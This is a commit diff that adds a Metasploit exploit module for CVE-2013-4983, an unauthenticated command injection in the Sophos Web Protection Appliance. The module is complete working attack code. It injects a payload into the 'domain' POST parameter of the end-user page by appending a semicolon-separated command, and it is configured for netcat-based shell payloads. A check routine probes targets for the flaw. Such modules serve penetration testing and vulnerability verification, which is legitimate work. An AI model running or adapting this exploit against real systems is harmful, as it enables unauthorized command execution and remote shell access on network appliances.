Add module for CVE-2013-4983

modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb

@@ -0,0 +1,117 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Sophos Web Protection Appliance sblistpack Arbitrary Command Execution',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability on Sophos Web Protection Appliance
+        3.7.9, 3.8.0 and 3.8.1. The vulnerability exists on the sblistpack component, reachable
+        from the web interface without authentication. This module has been tested successfully
+        on Sophos Virtual Web Appliance 3.7.0.
+      },
+      'Author'         =>
+        [
+          'Francisco Falcon', # Vulnerability discovery and PoC
+          'juan vazquez'      # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-4983' ],
+          [ 'OSVDB', '97028' ],
+          [ 'BID', '62263'],
+          [ 'EDB', '28175'],
+          [ 'URL', 'http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'BadChars'    => "\x27\x22\x5c",
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic netcat-e' # Because quotes and double-quotes aren't valid
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Sophos Web Protection Appliance 3.7.0', { }]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 06 2013'
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(443)
+      ],
+      self.class
+    )
+
+  end
+
+  def check
+    url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
+    domain = "http://#{rand_text_alpha(10 + rand(10))}.com"
+    res = send_exploit_query(url, domain)
+
+    if res and res.code == 302 and res.headers.include?('Location') and res.headers['Location'] =~ /#{url}/
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("#{rhost}:#{rport} - Executing payload...")
+    url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
+    domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.raw}"
+    # very short timeout because the request may never return if we're
+    # sending a socket payload
+    send_exploit_query(url, domain, 0.01)
+  end
+
+  def send_exploit_query(url, domain, timeout = 20)
+    user = rand_text_alpha(8 + rand(5))
+    res = send_request_cgi({
+      'uri' => normalize_uri('end-user', 'index.php'),
+      'method' => 'POST',
+      'vars_get' => {
+        'c' =>'blocked',
+        'action' => 'continue'
+      },
+      'vars_post' => {
+        'url'             => "#{Rex::Text.encode_base64(url)}",
+        'args_reason'     => rand_text_alpha(15 + rand(5)),
+        'filetype'        => rand_text_alpha(15 + rand(5)),
+        'user'            => user,
+        'user_encoded'    => "#{Rex::Text.encode_base64(user)}",
+        'domain'          => domain,
+        'raw_category_id' => "#{rand_text_alpha(4 + rand(8))}|#{rand_text_alpha(4 + rand(8))}"
+      }
+    }, timeout)
+
+    return res
+  end
+
+end